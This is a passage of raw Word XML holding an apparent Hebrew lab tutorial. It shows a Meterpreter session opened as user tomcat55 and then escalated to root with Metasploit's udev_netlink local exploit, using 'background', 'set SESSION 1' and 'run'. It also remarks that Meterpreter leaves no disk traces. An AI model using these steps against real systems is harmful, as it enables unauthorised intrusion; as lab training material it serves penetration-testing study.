          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C5DAA74" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0060EA21" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21029A21" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BDFA8EC" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E605228" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="603C9C13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03C730D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A166DA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9794E6C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DC26C43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36C016D0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lastRenderedPageBreak/>
        <w:t>אפשר לראות שההתקפה הצליחה ונפתח</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">session 1 </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> בהמשך נצטרך לזכור שזו השיחה הראשונה שנפתחה שמספרה </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5754DB" w14:textId="6A00645F" w:rsidR="0005369A" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="0005369A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ה</w:t>
      </w:r>
      <w:r w:rsidR="00D621F1" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">eterpreter </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> הוא כלי מאוד יעיל</w:t>
      </w:r>
      <w:r w:rsidR="00D5647C" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D5647C" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">דומה מאוד למעטפת </w:t>
      </w:r>
      <w:r w:rsidR="00D5647C" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>shall</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> כדי לעזור לתוקפים. ניתן לבצע איתו מגוון רחב שלך פעולות במערכת הנתקפת.</w:t>
      </w:r>
      <w:r w:rsidR="00497E2B" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ל</w:t>
      </w:r>
      <w:r w:rsidR="00D621F1" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Meterpreter</w:t>
      </w:r>
      <w:r w:rsidR="00497E2B" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00497E2B" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> יש פקודות מעט שונות משל ה </w:t>
      </w:r>
      <w:r w:rsidR="00497E2B" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidR="0005369A" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> הרגיל אך פקודות אלה מאוד שימושיות לתוקף. אחד היתרונות של הכלי שהוא לא משאיר עקבות ב </w:t>
      </w:r>
      <w:r w:rsidR="0005369A" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hard disk</w:t>
      </w:r>
      <w:r w:rsidR="0005369A" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ובקבצי המערכת.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6012A9" w14:textId="4DA7F718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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B8A329" w14:textId="3FBF28B0" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="00D5647C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21056" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4FA96AB5" wp14:editId="223A7CF1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6675120" cy="1409700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="65" name="תמונה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80421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5BA3549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23F0B5DE" w14:textId="3F9AA9AB" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="00D5647C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06EBF28" wp14:editId="4358EE5A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>933450</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>93345</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="693420" cy="220980"/>
                <wp:effectExtent l="19050" t="19050" r="11430" b="26670"/>
                <wp:wrapNone/>
                <wp:docPr id="83" name="מלבן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EBA6" id="מלבן 83" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:73.5pt;margin-top:7.35pt;width:54.6pt;height:17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" filled="f" strokecolor="yellow" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="647DC20A" w14:textId="516F8DAB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4789E2E8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0FD2BFFE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40512" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="73181570" wp14:editId="7DFB5F06">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-350519</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>295276</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2842260" cy="3568808"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="86" name="תמונה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25" cy="358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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">בעזרת הפקודה </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>help</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>נוכל לראות את סוג רשימת הפקודות שנוכל להריץ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231C215B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39488" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2F795467" wp14:editId="5CA7CA8F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3071685</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>5080</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4001580" cy="3543300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="85" name="תמונה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35" cy="356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86EBD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54FCF17F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06C96EC1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8AA9EE1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49E037E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CF8C60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ED1B86E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E9D55A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4EC1E6A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2157C99D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3FDE3E50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C09585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41536" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2C12B34E" wp14:editId="64758BA1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-358141</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>82550</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2865819" cy="3139440"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:wrapNone/>
            <wp:docPr id="87" name="תמונה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55" cy="317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E837B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7F56CDE9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02667BE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C66C6DB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2DE78970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26906B46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0D703140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5DAA355C" w14:textId="64288984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0230763B" w14:textId="77777777" w:rsidR="00497E2B" w:rsidRPr="007D51BF" w:rsidRDefault="00497E2B" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54236280" w14:textId="151B3E7D" w:rsidR="00D5647C" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="00D5647C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lastRenderedPageBreak/>
        <w:t xml:space="preserve">אפשר לוודא גם שאנחנו במכונה הנכונה </w:t>
      </w:r>
      <w:r w:rsidR="00D5647C" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">באיזו הרשאת משתמש </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5138ED05" w14:textId="5FAD2E1F" w:rsidR="00D5647C" w:rsidRPr="007D51BF" w:rsidRDefault="00D5647C" w:rsidP="00D5647C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כרגע </w:t>
      </w:r>
      <w:r w:rsidR="00E667FB" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">השם </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">המשתמש הוא </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tomcat55</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3B5C27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42560" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0C7A8698" wp14:editId="538A264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956560" cy="746760"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="88" name="תמונה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B1AA3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1F49AA38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</w:p>
    <w:p w14:paraId="6813F95D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75EC0A79" wp14:editId="7B5AAE21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4777740" cy="3215640"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:wrapNone/>
            <wp:docPr id="66" name="תמונה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24883" w14:textId="3220738E" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="00D5647C" w:rsidP="006E68E4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1FDCC54" wp14:editId="3D5586A5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1893570</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>210185</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1116330" cy="209550"/>
                <wp:effectExtent l="19050" t="19050" r="26670" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="118" name="מלבן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62C5C" id="מלבן 118" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:149.1pt;margin-top:16.55pt;width:87.9pt;height:1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" filled="f" strokecolor="yellow" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB4C0BA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2D527211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4EEECF7D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3A9ADC08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61F7EEC7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7F903A41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5B17DA61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3D21A45D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4EAB578E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1E4ABF46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6065AF4D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עכשיו ננסה לתת לקבל הרשאות </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3802F96F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23104" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="60D710A9" wp14:editId="35A71A28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6571354" cy="830580"/>
            <wp:effectExtent l="0" t="0" r="1270" b="7620"/>
            <wp:wrapNone/>
            <wp:docPr id="67" name="תמונה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354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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">בשורת הפקודה נשתמש בפקודה </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>background</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> כדי שהשיחה תישאר פתוחה ברקע</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6527F6B5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4930605C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5FED84C2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  <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="360AF06D" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">ונעבור להשתמש במודול הזה </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>use exploit/</w:t>
      </w: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linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/local/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>udev_netlink</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5CB6594B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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>נציג את ההגדרות</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8C67F6" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"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66A3468C" wp14:editId="20D656C8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-140898</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>295910</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6785538" cy="2567940"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:wrapNone/>
            <wp:docPr id="68" name="תמונה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563" cy="256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Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577D40C7" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B2AE828" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38194CE1" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DA72170" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FBAAD63" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="479A97CA" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="747B802D" w14:textId="11DBBFEA" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr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365E272F" w14:textId="77777777" w:rsidR="00F66138" w:rsidRPr="007D51BF" w:rsidRDefault="00F66138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40F122AD" w14:textId="1ADD6B2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עכשיו נגדיר את מספר</w:t>
      </w:r>
      <w:r w:rsidR="00D5647C" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>השיחה שנשארה פתוחה ברקע השיחה הקיימת</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595D0619" w14:textId="6A0D4911" w:rsidR="00497E2B" w:rsidRPr="007D51BF" w:rsidRDefault="00497E2B" w:rsidP="00497E2B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lastRenderedPageBreak/>
        <w:t xml:space="preserve">כעת יש להגדיר את מספר השיחה </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB90EFC" w14:textId="2930C06C" w:rsidR="00497E2B" w:rsidRPr="007D51BF" w:rsidRDefault="00497E2B" w:rsidP="00497E2B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הפקודה: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set SESSION 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C50C321" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"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drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251825152" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="59CBFC0A" wp14:editId="0190ED1E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6645910" cy="2212340"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="69" name="תמונה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run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615A7AF7" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr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672C357D" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr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260CDB7F" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr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564D5DDE" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7116F978" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr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196D590C" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr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12FDDCEE" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr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30115973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נפתחה לנו עוד שיחה </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A15317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ועם הפקודה </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">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id</w:t>
      </w:r>
